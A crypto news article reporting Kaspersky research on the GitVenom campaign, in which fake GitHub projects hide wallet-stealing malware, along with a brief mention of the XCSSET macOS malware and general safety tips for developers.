Cybercriminals are exploiting open-source platforms like GitHub to distribute malware, targeting software developers and crypto users, according to new research from Kaspersky’s Securelist.
While open-source code is meant to accelerate development and foster collaboration, hackers are uploading fake repositories designed to trick developers into downloading infected software.
🕵️ Fake GitHub Projects Hide Crypto-Stealing Malware
Kaspersky warns that these malicious repositories are carefully crafted to appear legitimate, often mimicking real projects.
“Threat actors went to great lengths to make the repositories appear legitimate to potential targets.”
One example includes a bogus Telegram bot project designed to manage Bitcoin wallets. However, hidden within the code was malware capable of stealing browsing history and crypto wallet data.
🔹 Key malware components include:
✅ Clipboard hijackers—which scan a victim’s computer for crypto wallet addresses, replacing them with attacker-controlled addresses.
✅ Data exfiltration—stealing passwords, banking details, and crypto wallet keys, then sending them to hackers via Telegram.
As of November 2024, one such Bitcoin wallet linked to the malware had already received a lump sum of 5 BTC (~$443,000 at current prices).
🌍 GitVenom’s Global Spread: Devs in Russia, Brazil & Turkey Hit Hard
Kaspersky has identified a new malware campaign named “GitVenom”, which has infected developers globally, with Russia, Brazil, and Turkey being the most affected regions.
With millions of developers relying on GitHub and other code-sharing platforms, these attacks highlight the growing risks of using unverified open-source code.
“For that reason, it is crucial to handle processing of third-party code very carefully. Before attempting to run such code or integrate it into an existing project, it is paramount to thoroughly check what actions it performs.”
⚠️ More Crypto Malware Targeting Developers
GitVenom isn’t the only active malware targeting software developers.
Last week, Microsoft Intelligence warned about a new variant of XCSSET, a macOS-focused malware that is capable of stealing cryptocurrency from infected devices.
🔹 XCSSET spreads through infected Xcode projects—the software environment used to develop macOS and iOS applications.
🔹 Once inside a system, the malware can extract crypto wallet credentials and perform unauthorized transactions.
🛡️ How Developers Can Stay Safe
Given the increasing malware risks on open-source platforms, developers should adopt best practices to secure their systems:
🔹 Verify code sources—Only download trusted repositories from verified authors.
🔹 Manually inspect code—Look for unexpected scripts, HTTP requests, or obfuscated commands.
🔹 Use sandbox environments—Test third-party code in isolated environments before running it on main systems.
🔹 Monitor clipboard activity—Be aware of any unexpected changes in copied wallet addresses.
🚀 The Bigger Picture: Open-Source Security at Risk
As crypto adoption grows, cybercriminals are shifting focus toward high-value targets like developers who build financial apps and manage digital assets.
With GitHub and other repositories being widely used, securing open-source platforms will be critical to preventing further crypto-related exploits.
For developers, the message is clear: verify everything before running it—because even the most legitimate-looking GitHub project could be a trap.
Bitcoin 
Ethereum 
Tether 
XRP 
BNB 
Solana 
USDC 
Dogecoin 
Cardano 
Lido Staked Ether